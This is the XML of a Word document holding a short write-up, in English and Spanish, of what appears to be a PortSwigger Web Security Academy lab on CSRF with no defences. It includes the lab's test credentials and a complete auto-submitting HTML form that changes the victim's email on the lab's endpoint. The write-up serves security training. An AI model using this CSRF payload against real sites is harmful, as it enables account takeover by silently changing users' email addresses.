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E8A63" w14:textId="513D6854" w:rsidR="003E55A6" w:rsidRDefault="003E55A6" w:rsidP="003E55A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6732"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E55A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: CSRF vulnerability with no defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F10CFD" w14:textId="77777777" w:rsidR="003E55A6" w:rsidRPr="003E55A6" w:rsidRDefault="003E55A6" w:rsidP="003E55A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6732"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393FDB9F" w14:textId="77777777" w:rsidR="003E55A6" w:rsidRPr="003E55A6" w:rsidRDefault="003E55A6" w:rsidP="003E55A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6732"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="003E55A6">
        <w:t>This lab's email change functionality is vulnerable to CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D92C90" w14:textId="77777777" w:rsidR="003E55A6" w:rsidRPr="003E55A6" w:rsidRDefault="003E55A6" w:rsidP="003E55A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6732"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="003E55A6">
        <w:t>To solve the lab, craft some HTML that uses a </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="003E55A6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CSRF attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E55A6">
        <w:t> to change the viewer's email address and upload it to your exploit server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F20ABD" w14:textId="6A8C278A" w:rsidR="003E55A6" w:rsidRDefault="003E55A6" w:rsidP="003E55A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6732"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="003E55A6">
        <w:t>You can log in to your own account using the following credentials: wiener:peter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E281F20" w14:textId="77777777" w:rsidR="003E55A6" w:rsidRDefault="003E55A6" w:rsidP="003E55A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6732"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2735F3CF" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">Mediante un proxy se intercepta el log referente al cambio de correo por parte del usuario. Con el se extrae la información para ejecutar esta sentencia: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD71660" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7"/>
    <w:p w14:paraId="65825A55" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D05993" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58094F6B" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">    &lt;form method="POST" action="https://0a75003b03b2613c803a21ad00120066.web-security-academy.net/my-account/change-email"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78388EBD" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="hidden" name="email" value="anything@web-security-academy.net"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8E4D1" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">        &lt;input type="submit" value="Submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FEFF04" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A152C" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325AEEDC" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">        document.forms[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A3866" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A29007" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C1065" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8DC0D7" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7"/>
    <w:p w14:paraId="7C2BFA41" w14:textId="77777777" w:rsidR="009442F7" w:rsidRDefault="009442F7" w:rsidP="009442F7">
      <w:r w:rsidRPr="00DB3C82">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E2C7D15" wp14:editId="4BC77701">
            <wp:extent cx="5638800" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54458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81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4908" w14:textId="77777777" w:rsidR="003E55A6" w:rsidRPr="003E55A6" w:rsidRDefault="003E55A6" w:rsidP="003E55A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6732"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003E55A6" w:rsidRPr="003E5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00EAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A95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2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A6"/>
    <w:rsid w:val="00235C41"/>
    <w:rsid w:val="003E55A6"/>
    <w:rsid w:val="006348CE"/>
    <w:rsid w:val="009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4D963"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80185657-31D5-A942-A076-E6F1BC3F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5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5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786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18869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355">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="CBD0D1"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2145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swigger.net/web-security/cs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Arias Medina</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Andres Felipe Arias Medina</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-20T01:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-20T03:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>